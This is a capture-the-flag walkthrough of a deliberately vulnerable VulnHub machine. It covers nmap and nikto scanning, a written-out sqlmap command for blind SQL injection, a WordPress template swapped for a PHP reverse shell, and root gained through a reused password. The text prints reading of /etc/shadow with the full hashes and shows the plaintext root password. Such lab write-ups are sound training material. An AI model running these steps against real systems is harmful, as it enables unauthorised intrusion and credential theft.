TopHatSec: Freshly
Location
https://www.vulnhub.com/entry/tophatsec-freshly,118/
Description
The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. 🙂
There are a couple of different ways that you can go with this one. Good luck!
Enumeration
Because I need an entry point, I’m going to start with a nmap scan to discover some open ports.
nmap -A -T4 -sV -p- 192.168.110.5
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 |
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-11 14:29 CEST Nmap scan report for 888.darknet.com (192.168.110.2) Host is up (0.013s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd |_http-server-header: Apache |_http-title: 400 Bad Request | ssl-cert: Subject: commonName=www.example.com | Not valid before: 2015-02-17T03:30:05 |_Not valid after: 2025-02-14T03:30:05 8080/tcp open http Apache httpd |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). Device type: bridge|general purpose Running (JUST GUESSING): Oracle Virtualbox (96%), QEMU (95%) OS CPE: cpe:/o:oracle:virtualbox cpe:/a:qemu:qemu Aggressive OS guesses: Oracle Virtualbox (96%), QEMU user mode network gateway (95%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 0.26 ms 10.0.3.2 2 0.31 ms 888.darknet.com (192.168.110.2) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 34.52 seconds |
So port 80, 443, and 8080 are open. I’ll start with port 80.
“These are not the droids you’re looking for”. Always love that sentence! Let’s check if it’s a reference to /robots.txt? Nothing.
nikto -h http://192.168.110.2/
1 2 |
+ /login.php: Admin login page/section found. + /phpmyadmin/: phpMyAdmin directory found |
SQL Injection
Two login pages. When I try /login.php first there is nothing of interest in the source code. Also the HTTP header shows nothing of interest. I try to inject some single quotes to get an error but nothing. I’m going to try login number 2, but in the meantime I’m going to give sqlmap a try with login number 1.
sqlmap -u “http://192.168.110.2/login.php/” –data=”user=&password=&s=Submit” –random-agent –not-string=”0″ –level=5 –risk=3
Login number 2 is a phpMyadmin page. When I try to login, I get a response.
A MySQL server. Lets try some single quotes here. I try different combinations, but I don’t get a wanted response. In the meantime I check on the running sqlmap and see that the first login page is vulnerable to time-based blind SQLi.
So I get the credentials of two users. Let’s log in with the first user. When I login with the known credentials there is a response on the page in the form of a ‘1’. When using bogus credentials the response on the page is ‘0’. Because there is nothing to retrieve from this page I let sqlmap retrieve the credentials from the tables phpmyadmin and wordpress8080.
When I visit the website on port 8080 there is a comment:
1 |
Nice Find!...Proceed |
Again, no robots.txt and except a page named /img/ (with a collection of pictures inside), there was nothing to find with nikto. When I proceed I arrive at a wordpress site.
There is a comment on the page with a small reference to Star Wars again.
1 |
Hmm….. maybe you missed something ? –jedi mind tricks…. |
I don’t think I missed something, seeing I probably got the credentials for logging in the wordpress account. Time to use the credentials.
WordPress
Getting a reverse shell
To get a reverse shell, I’m altering the 404 page and replace the php code with the php reverse shell code from pentestmonkey.
And I’m in. Time to search around the system.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
daemon@Freshly:/$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION=”Ubuntu 14.04.1 LTS”
NAME=”Ubuntu”
VERSION=”14.04.1 LTS, Trusty Tahr”
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME=”Ubuntu 14.04.1 LTS”
VERSION_ID=”14.04″
HOME_URL=”http://www.ubuntu.com/”
SUPPORT_URL=”http://help.ubuntu.com/”
BUG_REPORT_URL=”http://bugs.launchpad.net/ubuntu/”
daemon@Freshly:/$ uname -a
uname -a
Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686 i686 i686 GNU/Linux
Ubuntu 14.04 with kernel 3.13. I know that there is a privilege escalation possible when using overlayfs mounts inside of user namespaces. To get the script to work I need to compile it. So I need gcc. Let’s see if it available.
daemon@Freshly:/tmp$ compgen -c | grep -i “gcc”
compgen -c | grep -i “gcc”
daemon@Freshly:/tmp$
Noting. Bummer.
Time to move along and search some more.
daemon@Freshly:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = “NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!”
Ok. This was a bit unexpected. Guess this wraps this challenge up. Only thing is that I don’t have root access and I haven’t pwned this machine. Stopping now will leave me with an unsatisfying feeling.
daemon@Freshly:/home$ cat /etc/shadow
cat /etc/shadow
root:$6$If.Y9A3d$L1/qOTmhdbImaWb40Wit6A/wP5tY5Ia0LB9HvZvl1xAGFKGP5hm9aqwvFtDIRKJaWkN8cuqF6wMvjl1gxtoR7/:16483:0:99999:7:::
daemon:*:16483:0:99999:7:::
bin:*:16483:0:99999:7:::
sys:*:16483:0:99999:7:::
sync:*:16483:0:99999:7:::
games:*:16483:0:99999:7:::
man:*:16483:0:99999:7:::
lp:*:16483:0:99999:7:::
mail:*:16483:0:99999:7:::
news:*:16483:0:99999:7:::
uucp:*:16483:0:99999:7:::
proxy:*:16483:0:99999:7:::
www-data:*:16483:0:99999:7:::
backup:*:16483:0:99999:7:::
list:*:16483:0:99999:7:::
irc:*:16483:0:99999:7:::
gnats:*:16483:0:99999:7:::
nobody:*:16483:0:99999:7:::
libuuid:!:16483:0:99999:7:::
syslog:*:16483:0:99999:7:::
messagebus:*:16483:0:99999:7:::
user:$6$MuqQZq4i$t/lNztnPTqUCvKeO/vvHd9nVe3yRoES5fEguxxHnOf3jR/zUl0SFs825OM4MuCWlV7H/k2QCKiZ3zso.31Kk31:16483:0:99999:7:::
mysql:!:16483:0:99999:7:::
candycane:$6$gfTgfe6A$pAMHjwh3aQV1lFXtuNDZVYyEqxLWd957MSFvPiPaP5ioh7tPOwK2TxsexorYiB0zTiQWaaBxwOCTRCIVykhRa/:16483:0:99999:7:::
# YOU STOLE MY PASSWORD FILE!
# SECRET = “NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!”
After a really long time. I tried to use different passwords that were stored in the database on the root account and guess what? Passwords are reused in this challenge 🙂
daemon@Freshly:/$ su root
su root
Password: SuperSecretPassword
root@Freshly:/# id
id
uid=0(root) gid=0(root) groups=0(root)
Now I can close this challenge with a satisfied feeling.
Good work on making this challenge.